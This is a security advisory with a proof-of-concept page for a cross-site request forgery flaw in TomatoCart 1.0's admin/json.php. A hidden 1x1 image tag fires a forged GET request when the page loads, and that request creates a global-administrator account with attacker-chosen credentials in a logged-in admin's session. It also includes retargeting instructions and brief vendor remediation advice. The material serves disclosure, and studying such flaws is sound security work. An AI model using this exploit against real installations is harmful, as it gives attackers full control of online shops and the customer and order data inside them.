TomatoCart version 1.0 suffers from a cross-site request forgery vulnerability: the administrator save action in admin/json.php accepts a state-changing GET request with no anti-CSRF token, so a logged-in administrator who views an attacker-controlled page can be made to create a new global-admin account with attacker-chosen credentials.
<!------------------------------------------------------------------------
# Software................TomatoCart 1.0
# Vulnerability...........Cross-Site Request Forgery (CSRF / XSRF)
# Download................http://www.tomatocart.com/
# Release Date............7/1/2010
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://cross-site-scripting.blogspot.com/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A cross-site request forgery vulnerability in TomatoCart 1.0 can be
# exploited to create a new admin. The save_administrator action of the
# administrators module (admin/json.php) performs the account creation on
# a plain GET request and does not require an anti-CSRF token, so a single
# <img> tag on an attacker-controlled page is enough to trigger it. The
# victim must be logged in to the TomatoCart admin panel in the same
# browser; the created account gets access_globaladmin=on and the
# user_name / user_password supplied in the request below.
#
#
--PoC-->
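<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>TomatoCart 1.0 CSRF PoC - create administrator</title>
</head>
<body>
  <!--
    Preconditions:
      * The victim must be authenticated to the TomatoCart admin panel in the
        browser that renders this page (the forged request rides on the
        victim's session cookie).
      * Replace "localhost/tomatocart" with the host and path of the target
        installation; the path below matches the advisory's XAMPP test setup.
    Mechanics:
      The save_administrator action is reachable with a plain GET and carries
      no anti-CSRF token, so a 1x1 image is sufficient to fire the request as
      soon as the page loads - no script, no form submission. The request asks
      for user_name=new_admin, user_password=Password1 and
      access_globaladmin=on; change those to attacker-chosen values. The
      "modules" list is reproduced verbatim from the original advisory.
    Remediation (vendor side):
      Reject GET for state-changing admin actions and require a per-session
      anti-CSRF token on the POST; additionally check Origin/Referer.
  -->
  <img src="http://localhost/tomatocart/admin/json.php?module=administrators&action=save_administrator&modules=categories%2Cfeature_products_manager%2Cmanufacturers%2Cproduct_variants%2Cproducts%2Cproducts_attributes%2Cproducts_expected%2Cquantity_discount_groups%2Creviews%2Csearch_terms%2Cspecials%2Cconfiguration%2Cwizard_installation%2Chomepage_meta_info%2Carticles%2Carticles_categories%2Cfaqs%2Cslide_images%2Crecorvered_cart%2Ccoupons%2Ccredits_memo%2Ccustomers%2Ccustomers_groups%2Cemail%2Cgift_certificates%2Cinvoices%2Corders%2Corders_returns%2Cpurchased_downloadables%2Ccountries%2Ccredit_cards%2Ccurrencies%2Cimage_groups%2Cinformation%2Clanguages%2Corders_status%2Ctax_classes%2Cunit_classes%2Cweight_classes%2Czone_groups%2Cmodules_geoip%2Cmodules_order_total%2Cmodules_payment%2Cmodules_shipping%2Cservices%2Creports_customers%2Creports_products%2Creports_web%2Clogo_upload%2Ctemplates%2Ctemplates_modules%2Ctemplates_modules_layout%2Cadministrators%2Cadministrators_log%2Cbackup%2Cbanner_manager%2Ccache%2Cdashboard%2Cemail_templates%2Cfile_manager%2Cgoogle_sitemap%2Cimages%2Cimport_export%2Cnewsletters%2Cserver_info%2Cwhos_online&access_globaladmin=on&user_name=new_admin&user_password=Password1&email_address=test%40test.com" alt="" width="1" height="1">
</body>
</html>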